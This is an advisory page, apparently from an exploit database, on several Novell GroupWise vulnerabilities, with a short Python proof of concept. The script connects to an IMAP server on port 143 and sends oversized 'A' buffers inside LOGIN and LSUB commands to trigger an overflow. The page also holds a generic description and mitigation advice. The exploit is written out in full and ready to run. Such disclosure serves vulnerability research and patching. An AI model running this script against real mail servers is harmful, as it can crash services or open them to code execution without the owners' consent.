Novell GroupWise Multiple Vulnerabilities

vendor:

GroupWise

by:

Francis Provencher

7.5

CVSS

HIGH

Remote code-execution, Information-disclosure, Cross-site scripting

CWE

Product Name: GroupWise

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Novell GroupWise Multiple Vulnerabilities

The vulnerabilities in Novell GroupWise allow for multiple attacks including remote code-execution, information-disclosure, and cross-site scripting. By exploiting these vulnerabilities, an attacker can steal cookie-based authentication credentials, obtain sensitive information, or execute arbitrary code in the context of the user running the affected application. The harvested information can be used for further attacks, and other attacks are also possible.

Mitigation:

Apply the latest patches and updates from Novell. Implement strong authentication mechanisms and user input validation to mitigate the risk of code execution and information disclosure. Regularly monitor for any suspicious activity.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44732/info

Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible.

#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#
 
 
import socket
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
buffer = '\x41' * 1368
 
s.connect(('192.168.100.178',143))
s.recv(1024)
s.send('A001 LOGIN test  test ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 LSUB aa ' + buffer + '\r\n')
s.recv(1024)
s.close()